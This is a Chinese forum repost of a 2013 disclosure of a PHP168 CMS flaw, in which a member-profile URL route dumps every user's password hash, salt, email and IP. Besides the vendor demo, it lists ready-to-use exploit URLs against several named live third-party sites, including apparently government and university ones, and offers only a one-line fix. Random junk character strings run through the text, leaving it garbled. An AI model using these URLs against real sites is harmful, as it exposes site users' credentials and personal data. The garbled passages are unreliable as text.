中国网络渗透测试联盟

标题: PHP168漏洞可查询任意用户数据 [打印本页]

作者: admin 时间: 2013-9-21 16:02
标题: PHP168漏洞可查询任意用户数据
简要描述：

国微PHP168中出现了一处神奇的array，可致全站用户数据泄露。泄露的内容包括全站用户的密码密文、邮箱、密码salt、IP等敏感信息。

详细说明：

PHP168程序内置“用户”模块包含用户个人资料展示页面。在很多实际场景中，这个页面不会在前台使用，但可直接通过URL进行访问。页面路由为：/homepage.php/[用户名]/member-profile
$ l2 k& w: [% a; k2 _( [* L5 K0 b
3 h/ U, E4 U3 E# [" x2 D以PHP168官方演示站点为例，查看任意用户信息的页面链接为：5 N' A/ d1 {- u4 z/ f$ F! u
/ f9 @  w- r8 M6 d/ ?1 j
http://php168.cn/com/homepage.php/admin/member-profile8 q; s  `, ~4 q, R  J- L* H; K4 u) f
5 j& f* r7 n! B# I$ E- u! N
由于该模块代码中出现了一句神奇的array，导致用户数据表内所有数据被当作数组取出直接显示出来。
+ F3 y+ W3 {: Y! l6 c6 c4 Thttp://www.myhack58.com/Article/UploadPic/2013-9/2013920918425520.jpg
5 e: r/ `+ m' _- ]7 ?& x  j# y, M: J0 f. `" r# B3 }* ^6 L, Z! f, v

漏洞证明：

该漏洞影响使用该CMS系统的站点，以PHP168官网上的客户案例为例：
! J4 A2 z" ~' w9 d. O4 z' Y9 Z6 r# i0 U  y2 U$ @' m4 k  R
http://www.zjfzol.com.cn/homepage.php/admin/member-profile
) {7 e0 b6 Y$ Z" T, u* i& ~% a+ ]
( {4 L* a. ~4 I! F5 O, ~; Zhttp://www.scswl.cn/homepage.php/admin/member-profile
( A9 V( H$ P# A. ^/ N0 [5 p, P" [5 I9 C4 f7 ]; T
http://www.tunet.edu.cn/homepage.php/admin/member-profile. V8 ~% U  a8 {8 u

4 L- i4 S/ V" V6 v4 u; Khttp://www.itlead.com.cn/homepage.php/admin/member-profile1 T" C: w# c/ ]( e. _- B) }

7 g8 ^8 H  G6 i% e+ @6 }( t, Dhttp://www.aedp.cn/homepage.php/admin/member-profile+ F2 W* B+ g% K6 n5 A

6 k* L1 R9 X. s% F& ~! k% [4 Vhttp://www.qianlongnews.com/homepage.php/test/member-profile9 }! D$ y( x0 K1 k0 C3 K8 A# _
% S" |& }4 `9 ^
http://ny.zlxk.com/gov/homepage.php/admin/member-profile

修复方案：

去掉输出

[/td][/tr]
[/table]

欢迎光临中国网络渗透测试联盟 (https://www.cobjon.com/)